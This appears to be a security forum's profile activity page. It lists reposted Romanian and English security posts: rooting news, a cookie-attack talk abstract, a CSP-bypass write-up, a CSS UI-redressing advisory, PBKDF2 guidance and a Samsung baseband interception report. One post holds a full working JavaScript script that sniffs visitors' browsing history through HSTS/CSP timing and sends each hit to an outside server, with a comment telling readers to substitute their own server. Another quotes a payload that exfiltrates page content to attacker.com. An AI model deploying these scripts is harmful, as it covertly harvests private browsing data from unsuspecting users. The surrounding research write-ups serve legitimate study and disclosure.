Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    707

 Content Type 

Everything posted by Nytro

  1. Nytro
    Thanks. Da, e extinsa. Nu se vand/cumpara sau ofera gratuit astfel de lucruri.
  2. Nytro
    Windows Phone Internals 1.0 - primul toolkit pentru root-area telefoanelor Lumia Aurelian Mihai - 26 nov 2015 Prin eforturile unui hacker foarte activ în comunitatea XDA Developer, utilizatorii de telefoane Lumina cu sistem Windows Phone vor putea de acum s?-?i personalizeze versiunea de OS instalat? la fel ca utilizatorii de Android. Astfel, cu Windows Phone Internals 1.0 po?i debloca bootloader-ul implicit de pe telefoanele Lumia ?i aplica procedeul de Root, ob?inând acces la m?runtaiele sistemului de operare ?i chiar posibilitatea de a instala ROM-uri Windows Phone neoficiale, modificând sau extinzând func?ionalitatea de baz? a dispozitivului. Potrivit dezvoltatorului cunoscut dup? pseudonimul Heathcliff, software-ul suport? deja ?majoritatea versiunilor de Windows Phone 8.1 ?i Windows 10 Mobile„. Desigur, ca ?i în cazul procedeului similar folosit pentru modificarea dispozitivelor cu Android, interven?iile aduse de utilizatori pot duce la pierderea garan?iei asigurate de produc?tor, în eventualitatea în care modific?rile f?cute duc la defectarea dispozitivului. Pentru moment, utilitatea kit-ului Windows Phone Internals este limitat?, neexistând înc? ROM-uri Windows Phone personalizate disponibile pentru instalare. Îns? lucrurile se vor schimba cu siguran?? dup? ce membrii comunit??ii XDA vor apuca s? experimenteze cu noul software. Sursa: Windows Phone Internals 1.0 - primul toolkit pentru root-area telefoanelor Lumia Imi plac articolele celor de la go4it.
  3. Nytro
    Nu stiu daca s-a mai postat: https://crowdshield.com/bug-bounty-list.php
  4. Nytro
    Remotely Sniffing Browser History via XSS Using HSTS + CSP This is a PoC/demo and on how to remotely "sniff" user's browsing history via Cross-Site Scripting (XSS) vulnerabilities via HSTS/CSP timing attacks. All credits for the original exploit go to @bcrypt which can be downloaded here:https://github.com/diracdeltas/sniffly. The below source code allows for remote exploitation of clients and remote dumping of positive matches back to a specified web browser. Source code: /** * @<a href="https://rstforums.com/forum/members/file/" target="_blank">file</a>overview This file loads a bunch of HSTS domains and times how long it * takes for them to be redirected from HTTP to HTTPS. Based on that, it * decides whether the domain is a previously-noted HSTS domain or not. * @author yan <yan@mit.edu> * @license MIT * @version 0.2.0 */ // Timing in milliseconds above which a network request probably occurred. // TODO: Determine this dynamically from the distribution of response times. var TIMING_UPPER_THRESHOLD = 5; // Timing in milliseconds below which a request time is probably a measurement // fluke. var TIMING_LOWER_THRESHOLD = -10; // Timing allowance for a synchronous image load, which we use to confirm // positive results in Chrome. var TIMING_CONFIRM_THRESHOLD = 20; // Use an arbitrary static preloaded HSTS host for timing calibration var BENCHMARK_HOST = 'http://torproject.org/'; // Initial timing calibration offset. This gets recalculated every other fetch. var OFFSET = 0; var visitedElem = document.getElementById('visited'); var notVisitedElem = document.getElementById('not_visited'); var disclaimer = document.getElementById('disclaimer'); var isFirefox = (window.navigator.userAgent.indexOf('Firefox') !== -1); var visited = []; // list of hosts that are potentially visited // Edit this based on scraper results. var hosts = ['http://www.npmjs.com/', 'http://savecrypto.org/', 'http://www.xoom.com/', 'http://atom.io/', 'http://angel.co/', 'http://vine.co/', 'http://www.oculus.com/en-us/', 'http://www.hackerrank.com/', 'http://noscript.net/', 'http://www.sixt.com/', 'http://www.crazydomains.com.au/', 'http://www.yola.com/', 'http://www.mailerlite.com/', 'http://giustizia.it/', 'http://notepad-plus-plus.org/', 'http://www.unfranchise.com.tw', 'http://www.ing-diba.de/', 'http://www.adreactor.com/', 'http://meduza.io/', 'http://www.wealthfront.com/', 'http://mail.live.com/default.aspx', 'http://muabannhanh.com/', 'http://upjers.com/', 'http://www.rabobank.nl/', 'http://www.ing.nl/', 'http://www.kickstarter.com/', 'http://creativemarket.com/', 'http://pinterest.com/', 'http://www.ashampoo.com/en/usd', 'http://www.sofort.com/', 'http://www.xing.com/', 'http://podio.com/', 'http://www.servis24.cz/', 'http://www.galeria-kaufhof.de/', 'http://www.kocpc.com.tw/', 'http://www.commbank.com.au/', 'http://recyclix.com/', 'http://www.usajobs.gov/', 'http://briian.com/', 'http://www.vultr.com/', 'http://about.gitlab.com/', 'http://www.tanga.com', 'http://wanelo.com/', 'http://herokuapp.com/', 'http://unsplash.com/', 'http://ria.com/', 'http://www.missguided.co.uk/', 'http://lever.co/', 'http://venmo.com/', 'http://ello.co/', 'http://www.template.net/', 'http://www.digid.nl/', 'http://qiwi.ru/', 'http://www.instacart.com/', 'http://www.touchofmodern.com/', 'http://roadtrippers.com/', 'http://www.freshdesignweb.com/', 'http://www.fnb.co.za', 'http://www.graphicsprings.com/', 'http://www.patreon.com/', 'http://hotwords.com/', 'http://www.cryptsy.com/', 'http://vitalsource.com/', 'http://pass.yandex.ua/', 'http://www.yammer.com/', 'http://ixquick.com/', 'http://sbis.ru/', 'http://www.ecosia.org/', 'http://www.freecycle.org/', 'http://pass.yandex.by/', 'http://www.mailjet.com/', 'http://www.yugster.com/', 'http://tinypng.com/', 'http://nest.com/', 'http://kat.cr/', 'http://www.practo.com/', 'http://c9.io/', 'http://beget.ru/', 'http://startpage.com/', 'http://www.bet-at-home.com/', 'http://tripcase.com/', 'http://www.douglas.de/', 'http://yande.re/post', 'http://www.bookbub.com/', 'http://www.swarmapp.com/', 'http://www.woorank.com/', 'http://paytm.com/', 'http://www.payza.com/', 'http://www.instapaper.com/', 'http://wikitech.wikimedia.org/', 'http://www.ipko.pl/', 'http://www.straighttalk.com/wps/portal/home', 'http://heroku.com/', 'http://www.privat24.ua', 'http://zimbra.free.fr/', 'http://www.blueapron.com/', 'http://secure.logmein.com/', 'http://adblockplus.org/', 'http://www.udemy.com/', 'http://tribalwars2.com/', 'http://sparkfun.com/', 'http://www.sparebank1.no/bank/', 'http://spotify.com/', 'http://creditkarma.com/', 'http://www.paxum.com/payment/phrame.php', 'http://jamberrynails.net/', 'http://fotolia.com/', 'http://stacksocial.com/', 'http://www.cms.gov/', 'http://iconfinder.com/', 'http://www.expireddomains.net/', 'http://navalny.com/', 'http://privatbank.ua/', 'http://www.englishforums.com/', 'http://www.hushmail.com/', 'http://www.pingdom.com/', 'http://www.zomato.com/', 'http://icook.tw/', 'http://www.office.com/', 'http://groupme.com/', 'http://wikimedia.org/', 'http://dapulse.com/', 'http://www.cuelinks.com/', 'http://www.attracta.com/', 'http://www.outlook.com/owa/', 'http://www.dnb.no/', 'http://www.lotterypost.com/', 'http://bitcoin.org/', 'http://href.li/', 'http://skandiabanken.no/', 'http://foursquare.com/', 'http://www.usa.gov/', 'http://www.bitgold.com/', 'http://quizlet.com/', 'http://www.alipay.com', 'http://yadi.sk/', 'http://duckduckgo.com/', 'http://www.dashlane.com/', 'http://www.ozbargain.com.au/', 'http://www.ricardo.ch/', 'http://www.fakku.net/', 'http://www.mturk.com/', 'http://www.national-lottery.co.uk/', 'http://www.onthebeach.co.uk/', 'http://www.icloud.com/', 'http://www.zenefits.com/', 'http://code.org/', 'http://www.chapters.indigo.ca/', 'http://www.dntx.com/', 'http://www.slsp.sk/', 'http://www.raise.com/', 'http://cinematrix.net/', 'http://www.baifubao.com/', 'http://blogun.ru/', 'http://videostripe.com/', 'http://typekit.com/', 'http://www.splitwise.com/', 'http://www.eobot.com', 'http://login.microsoftonline.com/', 'http://www.xero.com/', 'http://www.rakuten-sec.co.jp/', 'http://www.creativecow.net/', 'http://sweb.ru/', 'http://www.seroundtable.com/', 'http://www.hipchat.com/', 'http://subscribe.free.fr/', 'http://topvisor.ru/', 'http://www.avforums.com/', 'http://www.travelodge.co.uk', 'http://opendns.com/', 'http://www.pcloud.com/', 'http://www.akiba-online.com/', 'http://www.instamojo.com/', 'http://www.commsec.com.au/', 'http://assembla.com/', 'http://www.bukalapak.com/', 'http://www.docusign.net/', 'http://www.hotslogs.com/', 'http://www.consorsbank.de/home', 'http://www.searchlock.com/', 'http://madmimi.com/', 'http://www.bawagpsk.com/BAWAGPSK/PK', 'http://www.crunchbase.com/', 'http://www.maketecheasier.com/', 'http://session.wikispaces.com/1/auth/auth', 'http://witkit.com/', 'http://pixabay.com/', 'http://www.mygreatlakes.org/', 'http://ncore.cc/', 'http://www.hpconnected.com/', 'http://payeer.com/', 'http://join.me/', 'http://www.gamefly.com/', 'http://bitcoinwisdom.com/', 'http://land.nrw/', 'http://www.saddahaq.com/', 'http://www.quantcast.com/', 'http://www.behance.net/', 'http://xapo.com/', 'http://fabric.io/', 'http://www.dollarphotoclub.com/', 'http://mandrillapp.com/', 'http://moodle.org/', 'http://imp.free.fr/', 'http://www.pebble.com/', 'http://www.periscope.tv/', 'http://generalassemb.ly/', 'http://login.szn.cz/', 'http://www.lyft.com/', 'http://www.mql5.com/', 'http://www.wrike.com/', 'http://www.fanfiction.net', 'http://www.box.com/', 'http://www.test.de/', 'http://calendar.sunrise.am', 'http://www.djangoproject.com/', 'http://qiwi.com/', 'http://adlure.net/', 'http://www.stitchfix.com/', 'http://www.bankofthewest.com/', 'http://roem.ru/', 'http://www.carthrottle.com/', 'http://pass.yandex.kz/', 'http://gumroad.com/', 'http://www.hosteurope.de/', 'http://www.canva.com/', 'http://www.usbank.com/', 'http://evernote.com/', 'http://secure.actblue.com/', 'http://myspace.com/', 'http://www.jbhifi.com.au', 'http://www.physicsforums.com/', 'http://www.abnamro.nl/nl/index.html', 'http://twittercommunity.com/', 'http://wikileaks.org/', 'http://www.chmail.ir/', 'http://mail.ru', 'http://www.victoriassecret.com/', 'http://www.firstnational.com/', 'http://www.dominos.co.uk/', 'http://www.indiblogger.in/', 'http://www.zendesk.com/', 'http://www.hypovereinsbank.de/', 'http://www.openshift.com/', 'http://buffer.com/', 'http://what.cd/', 'http://hide.me/', 'http://trello.com/', 'http://www.comodo.com/', 'http://twilio.com/', 'http://www.alternate.de/', 'http://telegram.org/', 'http://www.manageengine.com/', 'http://unsw.edu.au/', 'http://www.flipkey.com/', 'http://www.popads.net/', 'http://myworkday.com/', 'http://www.meneame.net/', 'http://popcorntime.io/', 'http://iqoption.com/', 'http://www.tumblr.com/', 'http://www.reddit.com/', 'http://www.petfinder.com/', 'http://www.messenger.com/', 'http://www.digitalpoint.com/', 'http://www.blibli.com/', 'http://namu.wiki/', 'http://launchpad.net/', 'http://www.blognone.com/', 'http://www.ing.be/en/retail/Pages/index.aspx', 'http://acrobat.com/', 'http://mbank.pl/', 'http://www.fasttech.com/', 'http://www.post.ch/de', 'http://gyazo.com/', 'http://packagecontrol.io/', 'http://vimeo.com/', 'http://www.airbnb.es/', 'http://www.airbnb.it/', 'http://www.airbnb.fr/', 'http://www.airbnb.co.kr/', 'http://www.airbnb.de/', 'http://www.airbnb.co.uk/', 'http://www.airbnb.com.au/', 'http://www.airbnb.ca/', 'http://www.airbnb.co.in/', 'http://www.airbnb.com.br/', 'http://www.airbnb.ru/', 'http://www.centrum24.pl/centrum24-web/login', 'http://coursera.org/', 'http://ellislab.com/', 'http://www.udacity.com/', 'http://bitcointalk.org/', 'http://uwaterloo.ca/', 'http://vc.ru/', 'http://tjournal.ru/', 'http://www.biblegateway.com/', 'http://www.themuse.com', 'http://att.yahoo.com/', 'http://www.yahoo.com/', 'http://ficbook.net/', 'http://www.ameriprise.com/', 'http://www.here.com/', 'http://www.rocketlawyer.com/', 'http://exmo.com/', 'http://skladchik.com/', 'http://healthunlocked.com/', 'http://www.upwork.com/', 'http://www.thegioididong.com/', 'http://fermasosedi.ru/', 'http://www.thegrommet.com/', 'http://www.freelancer.com/', 'http://www.freelancer.in/', 'http://klout.com/', 'http://www.veikkaus.fi/', 'http://www.lucidchart.com/', 'http://www.opensuse.org/', 'http://monitorbacklinks.com/', 'http://www.5giay.vn/', 'http://noncombatant.org/', 'http://nonfreesoftware.org/', 'http://hackpad.com/', 'http://meta.discourse.org/', 'http://devinegan.com/', 'http://ongardie.net/', 'http://titanous.com/', 'http://www.funkthat.com', 'http://nelhage.com/', 'http://yawnbox.com/', 'http://rednerd.com', 'http://smbmarketplace.cisco.com/', 'http://www.cloudflare.com/', 'http://letsencrypt.org/', 'http://helloworld.letsencrypt.org/', 'http://hoffman-andrews.com/', 'http://jdkasten.com/', 'http://jhalderm.com/', 'http://jve.linuxwall.info/' ]; /** * Gets hostname from URL. */ function getHost_(url) { return url.replace('http://', '').split(/\/|\?/)[0]; } /** * Our CSP policy (HTTP-only images) causes this to fire whenever the img src * redirects to HTTPS, either by HSTS (307) or plain old redirects (301/302). * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} start Time when the image load started * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} host The host that fired the error * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function onImgError_(start, host) { var time = new Date().getTime() - start; if (host === BENCHMARK_HOST) { // This is just a calibration measurement so update the offset time. OFFSET = time; } else { // We need to subtract offset, otherwise hosts that are further down on the // page seem to have higher load times because of the time that it took for // the DOM to load. display(host, time - OFFSET, OFFSET); } } /** * Double-check whether hosts have been visited by trying synchronous image * loads, which have cleaner timing profiles. I find this helps reduce the * false positive rate in Chrome. AFAICT, the async image-load sniffing method * works great in Firefox so this isn't necessary there. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {function(string, number)} callback Gets called when img error fires. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {function()} finished Called when all loads are done. * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function confirmVisited_(callback, finished) { var initial; // initial time var img = new Image(); var timeouts = []; // array of timeout IDs var hostsDone = []; var dummySrc = 'http://example.com/'; // URL for timer initialization function clearTimeouts_() { // Clear existing timeouts timeouts.forEach(function(id) { window.clearTimeout(id); }); timeouts = []; } function doNext_() { if (visited.length === 0) { finished(); return; } // Shift instead of pop since we are pushing hosts into the array while // this is running var host = visited.shift(); initial = new Date().getTime(); var src = 'http://' + host + '/?' + initial.toString(); img.src = src; // Abort after 20ms since positive results should take less time anyway timeouts.push(window.setTimeout(img.onerror.bind({ src: src}), TIMING_CONFIRM_THRESHOLD)); } img.onerror = function() { if (this.src !== dummySrc) { clearTimeouts_(); var host = getHost_(this.src); if (hostsDone.indexOf(host) !== -1) { // We might have called the callback for this host already. console.log('already done, skipping', host); } else { hostsDone.push(host); callback(host, new Date().getTime() - initial); } } else { console.log('initialized timer using', this.src); } doNext_(); }; img.onload = function() { // Should never happen but add a callback in case so it doesn't block the // rest of the image requests from being sent. console.log('UNEXPECTEDLY LOADED', this.src); doNext_(); }; // Set the image source initially to a dummy URL b/c the first load seems to // always take a long time no matter what. img.src = 'http://example.com/'; } /** * Times how long a request takes by loading it as an img src and waiting for * the error to fire. I would use XHR here but it turns out CORS errors fire * before CSP. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} host */ function timeRequest(host) { var img = new Image(); img.onerror = onImgError_.bind(this, new Date().getTime(), host); // Add random params so we don't hit the cache img.src = host + '?' + Math.random().toString().substring(2); } /** * Measures the calibration drift so we have a better estimate of how long * a resource fetch actually took. Since we expect the time T to fetch a * preloaded STS host to be ~constant, the fact that it changes indicates * that our timing is getting skewed by some amount, probably due to DOM * processing. Correct for the skew by subtracting T from measurements that * happen shortly after. */ function calibrateTime() { timeRequest(BENCHMARK_HOST); } /** * Display the results. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} url * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} time * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} offset */ function display(url, time, offset) { var li = document.createElement('li'); var host = getHost_(url); li.id = host; li.appendChild(document.createTextNode(host)); if (time < TIMING_UPPER_THRESHOLD && time > TIMING_LOWER_THRESHOLD) { if (!isFirefox) { // If we are in Chrome, hide the results for now because the false // positive rate is really high until confirmVisited_() is called. li.style.color = 'lightgray'; } visitedElem.appendChild(li); visited.push(host); // +--== [ Remote Exploit by 1N3 @ CrowdShield - [URL]https://crowdshield.com[/URL] // Change url= to your own web server. var uri_visited = host; var uri = "http://xerosecurity.com/?redir=" + host; var port = 80; xhr = new XMLHttpRequest(); xhr.open("GET", uri + ":" + port, true); xhr.send(); } else { notVisitedElem.appendChild(li); } } if (!isFirefox) { // Chrome needs to do an extra timing confirmation step for results to be not // shitty. Wait 3 seconds for the async loads to mostly finish, then try one // synchrous load for each potentially-visited host. disclaimer.style.display = ''; window.setTimeout(function() { confirmVisited_(function(host, t) { if (!disclaimer.done_) { disclaimer.style.color = 'orange'; disclaimer.innerText = 'Removing false positives . . .'; disclaimer.done_ = true; } var elem = document.getElementById(host); if (!elem) { console.warn('No element found', host); return; } if (t <= TIMING_CONFIRM_THRESHOLD / 2) { console.log('showing', host, t); elem.style.color = ''; } else { console.log('hiding', host, t); elem.style.display = 'none'; notVisitedElem.appendChild(elem); } }, function() { disclaimer.style.color = 'green'; disclaimer.innerText = 'Done!'; saveCrypto_(!notVisitedElem.querySelector('#savecr ypto\\.org')); }); }, 3000); } else { window.setTimeout(function() { saveCrypto_(visitedElem.querySelector('#savecrypto \\.org')); }, 3000); } /** * Tell the user to sign this awesome petition if they haven't visited it! * Thank them if they have! * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {Boolean} signed * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function saveCrypto_(signed) { var text = signed ? 'PS: Thanks for signing <a href="https://savecrypto.org">savecrypto.org</a>! <3' : 'PS: Tell Obama to support strong encryption! Sign the petition at <a href="https://savecrypto.org">savecrypto.org</a>.'; disclaimer.style.display = ''; disclaimer.style.color = 'blue'; disclaimer.innerHTML = text; } // Main loop hosts.forEach(function(host) { calibrateTime(); timeRequest(host); }); Published by CrowdShield on 11/26/2015 Sursa: https://crowdshield.com/blog.php?name=remotely-sniffing-browser-history-via-xss-using-hsts-csp
  5. Nytro
    HITBGSEC 2015 - Dawid Czagan - Hacking Cookies in Modern Web Applications and Browsers PRESENTATION MATERIALS: Index of /materials/sg2015 PRESENTATION ABSTRACT: Since cookies store sensitive data (session ID, CSRF token, etc.) they are interesting from attacker’s point of view. As it turns out, quite many web applications (including sensitive ones like bitcoin platforms) have cookie related vulnerabilities that lead for example to user impersonation, remote cookie tampering, XSS and more. Developers tend to forget that multi-factor authentication will not help when cookies are insecurely processed. Security evaluators underestimate cookie related problems. Moreover, there are problems with secure processing of cookies in modern browsers and browser dependent exploitation can be used to launch more powerful attacks. That’s why secure cookie processing (from the perspective of web application and browser) is a subject worth discussing. The following topics will be presented: – cookie related vulnerabilities in web applications – insecure processing of secure flag in modern browsers – bypassing HttpOnly flag in Safari – problem with Domain attribute in Internet Explorer – cookie tampering in Safari – underestimated XSS via cookie – HTTP Strict Transport Security (HSTS) – importance of regeneration – and more ABOUT DAWID CZAGAN Dawid Czagan (@dawidczagan) has found security vulnerabilities in Google, Yahoo, Mozilla, Microsoft, Twitter, BlackBerry and other companies. Due to the severity of many bugs, he received numerous awards for his findings. Dawid is founder and CEO at Silesia Security Lab, which delivers specialized security auditing and training services. He also works as Security Architect at Future Processing. Dawid shares his security bug hunting experience in his hands-on training “Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more”. He delivered security trainings/workshops at Hack In The Box (Amsterdam), CanSecWest (Vancouver), DeepSec (Vienna), Hack In Paris (Paris) and for many private companies. He also spoke at Security Seminar Series (University of Cambridge) and published over 20 security articles (InfoSec Institute).
  6. Nytro

    CSP 2015

    Nytro posted a topic in Securitate web

    (the injected part is "><meta http-equiv="refresh" content='0;url=http://attacker.com/?>) Since browsers can handle only 1 redirection, they have to pick up only 1 among the three. Some browsers use the first one and some use the last one, but never the middle one. That is troublesome because we only care about the middle one. Now think about it: does CSP really cover all the possible ways to fetch resources? Another no. HTTPLeaks is a project that aims to enumerate all possible ways browsers leak requests. They can be something specific to browsers, features that defined by new specifications and whatnot. The most important thing is some of them will not be caught by CSP. In the attack I used prefetch from Resource Hints. Finally We just need to prevent the intended redirection so that our prefetch request will not be dropped. This can be done using javascript: pseudo protocol as browsers refuse to navigate to it in meta refresh. Now everything is set, and the final payload: javascript:"><link rel=prefetch href='//attacker.com/? ...Hooray! Access granted. CSP: 0.5 - Attacker 2.5. Fatality. You can find the original report from HackerOne. Takeaway A proper policy can significantly reduce the chance of XSS Beware of the nonce pitfall Content Exfiltration may be Achilles' Heel of CSP All in all, CSP does not replace input validation Sursa: http://blog.innerht.ml/csp-2015/
  7. Nytro
    November 23, 2015 Abusing CSS Selectors to Perform UI Redressing Attacks Jovon Itwaru Information Security Engineer Introduction Earlier this year, we received an interesting security advisory from Ruben van Vreeland of BitSensorregarding an issue discovered within our publishing platform. The technique Ruben described is unique and exemplifies the creativity needed to produce high-quality research. We analyzed his report and resolved the vulnerability. While we typically do not talk about bugs that we receive, the lesson learned and the uniqueness of this issue is worth sharing. In this blog post, we will describe Ruben’s novel attack that allows attackers to use existing CSS and style attributes to trick members into navigating to an attacker-controlled location, leading to potential social engineering and phishing attacks. Description As part of our publishing platform, we allow members to customize the look and feel and even share rich media content on their blog articles. This involves styling content with CSS, formatting with a subset of HTML elements, and also sharing audio/video resources. To mitigate certain classes of vulnerabilities such as XSS, a limited set of HTML tags (e.g. <img>, <a>, <p> and <br>) and safe attributes are allowed. Let’s dive into a simplified example that illustrates this technique. For instance, to create a blog entry, the following JSON request can be used to generate a new HTML page with an image tag and URL link. json{"content": "<p><a href=\"http://www.linkedin.com\">LinkedIn</a><img src=\"linkedin.png\"/></p>"} Resulting HTML page Rigorous input validation is performed on these elements to ensure attackers cannot introduce attribute or event handlers that would be used to construct XSS attacks. In some scenarios, it is possible to introduce benign attributes such as class that will not be flagged by the input validation filter. While this would not be a vulnerability by itself, Ruben realized that it can be used to reference existing CSS hosted on our site. Considering the extent of the platform, we have many CSS classes that are available on our CDNs and consumed by other products. For example, the following CSS styles are applied to the response page that renders blog entries: css<style> .li_style { position: absolute; width: 100%; z-index: 10021; position: fixed; top: 0; left: 0; width: 100%; height: 100%; padding: 0; overflow-y: scroll; _overflow-y: hidden } </style> This type of style is a common way to force an element to stretch the entire height and width of a page. With knowledge of this available CSS style, we can resubmit the request and reference this style: json{"content": "<p><a class=\"li_style\" href=\"http://www.example.com\">Example Site</a><img src=\"image.png\"/></p>"} The li_style covers the entire page. This, in turn, allows the page area to become clickable with a link to Example Domain. Impact and Recommendation As illustrated, an attacker can reuse trusted CSS class selectors to perform UI changes that are invisible to members. We believe that this attack is applicable to many sites, as many allow members to create and share rich media content. This is an interesting technique that uses existing resources to facilitate UI-redressing attacks by chaining together CSS class selectors, and has similarities to Return Oriented Programming (ROP). This technique can be used to send members to sites hosting malware or counterfeit sites that attempt to phish members by requesting their usernames and passwords. This is especially successful on social sites that share blogs or articles. As such, our recommendation is to only accept safe elements and attributes. For example, if theclass attribute is not allowed, reject any request that contains this. Additionally, whitelist filtering should be applied to CSS class selectors to permit necessary styles. We would like to thank Ruben for reporting this issue and help keeping our members safe. Thanks to his excellent work and communication with our team, Ruben was invited to join our private bug bounty program, hosted by HackerOne. This is one of many examples of the collaborations we experience with the talented researchers in our program. If you have a bug you would like considered, please submit to security@linkedin.com. Sursa: https://security.linkedin.com/blog-archive#11232015
  8. Nytro
    Acum, serios vorbind, pseudo-junalistii din ziua de azi sug pula.
  9. Nytro
    "ATENTIE de transmis URGENT Dac? ave?i un apel telefonic ?i pe mobil se afi?eaz? „A C E” nu r?spunde?i; anula?i apelul. Este un virus care distruge cartela SIM ?i distruge mobilul. Aceasta a fost confirmata de Motorola, Sagem si Nokia." WTF is this shit? De la comentarii: https://sternocleidomastoidian.wordpress.com/2010/04/14/informare-a-ministerului-de-interne/
  10. Nytro
    E pe bune, am luat eu root pe laser.
  11. Nytro
    Parameter choice for PBKDF2 PBKDF2, standardised in RFC 2898 and PKCS#5, is a function for creating a cryptographic key from a password. It is the only such function currently appearing in NIST standards, hence it has seen widespread use. The aim of the function is to create a key in such a way that dictionary attacks (where the attacker just tries a range of possible passwords) are unfeasible. To do this, PBKDF2 applies a pseudorandom function (PRF) to the password many times. This means that an attacker making a guess at the password will also have to apply the function many times to his guess. Additionally, the function can be given a “salt” parameter. The idea of this is to make each key derivation operation unique, so that an attacker cannot guess one password and then look for matches against a large number of derived keys. These properties mean PBKDF2 is used not just to produce a key to be used in a cryptographic protocol, but also to store passwords securely (by storing the derived keys). A developer using PBKDF2 must choose parameter values for the salt, the PRF, and the number of iterations, i.e. the number of times the PRF will be applied to the password when deriving the key. The specification suggests (in section 4.1) that the salt be (or contain) a 64 bit pseudorandom value. This makes collisions (i.e. occasions that two stored passwords use the same salt) unlikely. By the birthday paradox, we would expect a collision after 2^32 passwords, i.e. a little more than 4 billion. The PRF mentioned in the specification is SHA-1, and in many libraries this is the only choice. However, using SHA-256 or SHA-512 has the benefit of significantly increasing the memory requirements, which increases the cost for an attacker wishing to attack use hardware-based password crackers based on GPUs or ASICs. The recommended iteration count in the RFC published in September 2000 was 1000. Computing performance has greatly increased since then. Modern guides such as the OWASP password storage cheat sheet (2015) recommend 10 000 iterations.NIST’s own guide (Appendix A.2.2) recommends that the iteration count be “as high as can be tolerated while still allowing acceptable server performance”. Cracking Stuff What are the consequences of a low iteration count? Imagine we are restricted to using SHA-1 as our PRF, as is the case for example in PKCS#11 up to version v2.20. How long would it take a well-resourced attacker (i.e. with access to GPUs) to break an 8-character password? First we have to estimate how much entropy or “randomness” there is in an 8-character password. An excellent paper by Kelley et al. from IEEE Security and Privacy 2012 found that when users are forced to choose a password following the “Comprehensive8” policy, “Password must have at least 8 characters including an uppercase and lowercase letter, a symbol, and a digit. It may not contain a dictionary word.”, the result is roughly 33 bits of entropy. If, however, the password is a perfectly random combination of uppercase and lowercase letters, numbers and the 30 symbols on a US keyboard, we would expect 52 bits of entropy. Interestingly, the same result can be obtained by choosing 4 random words from the Diceware list. Second, we need to know how fast GPUs can calculate PBKDF2. An article from April 2013 reports a rate of 3 million PBKDF2 guesses per second on a typical GPU setup. This includes calculating AES once for each guess (to see if the right key has been derived to decrypt a master key file), and it’s now November 2015, so suppose conservatively we can apply Moore’s law almost once since then (whether one can apply Moore’s “law” to GPUs is doubtful), giving a very rough rule-of-thumb ability of 5 million guesses per second on typical GPU hardware. The table below shows how long an attacker would take to cover the whole password space of a single salted hashed password. [TABLE] [TR] [TH]Password complexity[/TH] [TH]Entropy estimate (bits)[/TH] [TH]1000 iterations[/TH] [TH]10000 iterations[/TH] [/TR] [TR] [TD]Comprehensive8[/TD] [TD]33[/TD] [TD]4 hours 46 minutes[/TD] [TD]47 hours[/TD] [/TR] [TR] [TD]8 random lowercase letters[/TD] [TD]37[/TD] [TD]12 hours[/TD] [TD]5 days[/TD] [/TR] [TR] [TD]8 random letters[/TD] [TD]45[/TD] [TD]123 days[/TD] [TD]3 years 5 months[/TD] [/TR] [TR] [TD]8 letters + numbers + punctuation OR 4 random Diceware words[/TD] [TD]52[/TD] [TD]325 years[/TD] [TD]3250 years[/TD] [/TR] [/TABLE] Conclusions If you have to use PBKDF2, you should: use a unique 64-bit salt for each password. rather than SHA-1, use SHA-512 or if not SHA-256 if you can. use an iteration count of at least 10000, more if you can do it “while still allowing acceptable server performance”. In a future blog post, we’ll cover other password hashing functions like bcrypt, scrypt, and the winner of the recent password hashing competition, ARGON-2. Sursa: https://cryptosense.com/parameter-choice-for-pbkdf2/
  12. Nytro
    Samsung S6 calls open to man-in-the-middle base station snooping Research duo pop baseband chip in preliminary demo-hack 12 Nov 2015 at 05:56, Darren Pauli PacSec Modern Samsung devices including the S6, S6 Edge and Note 4 can have phone calls intercepted using malicious base stations, according to initial research findings from two researchers. Daniel Komaromy and Nico Golde demonstrated the attacks on Samsung's 'Shannon' line of baseband chips today at the Mobile Pwn2Own competition at PacSec, Toyko. Full exploitation details of their research has not been publicly detailed, but it has been disclosed to Samsung. Their cheap man-in-the-middle attack requires an OpenBTS base station to be established and located near target handsets. Handsets will automatically connect to the bogus station. The malicious base station then pushes firmware to the phone's baseband processor (the chip that handles voice calls, and which isn't directly accessible to end users). The firmware patch pushes phone calls through the bogus base station, which redirects them to a proxy that records them and passes them on to the intended recipient. Komaromy says the full impact of the attack along with any mitigating factors will be known once seasoned researchers examine their work. "Our example of modifying the baseband to hijack calls is just an example," Komaromy told Vulture South. "The idea with hijacking would be that you can redirect calls to a proxy (like a SIP proxy) and that way you can man-in-the-middle the call. "So that means the caller sees her original call connected - but it can be recorded in the proxy [which is how] it's like a wiretap implant." Nico Golde (l) and Daniel Komaromy at Pwn2Own today. ?????? Drago Ruiu The attack was tested on a new Samsung Galaxy S6 Edge which PacSec organiser Dragos Ruiu took out of its box and updated before handing it over. "I turned it on next to their radio and then dialled myself," Ruiu says of the demonstration held deep below the Tokyo conference to avoid pwning delegate phones. "And instead of ringing on my phone it rang on theirs." The hacker duo now own the phone as a prize and will in March travel to Canada for CanSecWest on a ski trip along with their spouses. They will present further technical detail of the attack at that lauded conference. It comes as Chinese researcher Guang Gong popped the latest version of Google Chrome at the contest. As El Reg reported, the attack likely affects all Android phones and allows the devices to be completely compromised through a single exploit that requires no interaction beyond visiting a crafted web site. Ruiu is offering ski trips and vendors may cough up bug bounties in exchange for the winning hacks. Last year hackers hosed popular phones for shares in $425,000 in cash rewards, but security sponsors Google, Apple, Microsoft and Hewlett Packard's Zero Day Initiative pulled out. ® Sursa: Samsung S6 calls open to man-in-the-middle base station snooping • The Register
  13. Nytro
